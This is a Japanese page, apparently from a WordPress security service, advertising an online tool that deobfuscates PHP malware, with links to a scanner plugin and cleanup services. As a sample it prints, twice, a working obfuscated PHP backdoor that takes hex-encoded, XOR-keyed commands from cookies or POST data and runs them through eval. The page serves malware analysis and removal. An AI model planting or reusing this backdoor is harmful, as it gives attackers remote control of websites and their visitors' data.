Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $LEXiAVZO = "str_repeat"; $bYgpA = "explode"; $quyzNEYBh = "count"; $dtDUIBci = "pack"; $zdlIdRU = array( /* nqdD*/ "zRLYoIhl" => "ZapYfHfAtQFvMltL", ); $ioYxx = array("caKTDjLvdSZJcinNSriM" => "YRitufajjkQpPauXkUJyl"); $DTfwQi = array( $zdlIdRU, $_COOKIE, $zdlIdRU, /* o */ $_POST, $ioYxx, ); foreach ($DTfwQi as $DWKlivjab) { /*oXk */ foreach ($DWKlivjab as $LWyPwXL => $USNmk) { /* HONow*/ $USNmk = @$dtDUIBci("H*", $USNmk); $LWyPwXL .= "joZq-XjDTb-WqLIw-daF-TVWnsah-icNXrZy-MBfZ"; $LWyPwXL = $LEXiAVZO( /*D*/ $LWyPwXL, strlen($USNmk) / strlen($LWyPwXL) + 1 ); /* vM*/ $FWzKjVHn = $USNmk ^ $LWyPwXL; /* DNkx*/ $WTQCku = $bYgpA( /*Bwg */ '#', $FWzKjVHn ); if ($quyzNEYBh($WTQCku) == 3) { /*ejMUA*/ $kEWGW = $WTQCku[1]; $CuhRjAV = $WTQCku[2]; $BbFZAxTW = $kEWGW($CuhRjAV); eval($BbFZAxTW); die; } } /*N*/ } ?>
<?php $LEXiAVZO = "str_repeat"; $bYgpA = "explode"; $quyzNEYBh = "count"; $dtDUIBci = "pack"; $zdlIdRU = array( /* nqdD*/ "zRLYoIhl" => "ZapYfHfAtQFvMltL", ); $ioYxx = array("caKTDjLvdSZJcinNSriM" => "YRitufajjkQpPauXkUJyl"); $DTfwQi = array( $zdlIdRU, $_COOKIE, $zdlIdRU, /* o */ $_POST, $ioYxx, ); foreach ($DTfwQi as $DWKlivjab) { /*oXk */ foreach ($DWKlivjab as $LWyPwXL => $USNmk) { /* HONow*/ $USNmk = @$dtDUIBci("H*", $USNmk); $LWyPwXL .= "joZq-XjDTb-WqLIw-daF-TVWnsah-icNXrZy-MBfZ"; $LWyPwXL = $LEXiAVZO( /*D*/ $LWyPwXL, strlen($USNmk) / strlen($LWyPwXL) + 1 ); /* vM*/ $FWzKjVHn = $USNmk ^ $LWyPwXL; /* DNkx*/ $WTQCku = $bYgpA( /*Bwg */ '#', $FWzKjVHn ); if ($quyzNEYBh($WTQCku) == 3) { /*ejMUA*/ $kEWGW = $WTQCku[1]; $CuhRjAV = $WTQCku[2]; $BbFZAxTW = $kEWGW($CuhRjAV); eval($BbFZAxTW); die; } } /*N*/ }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.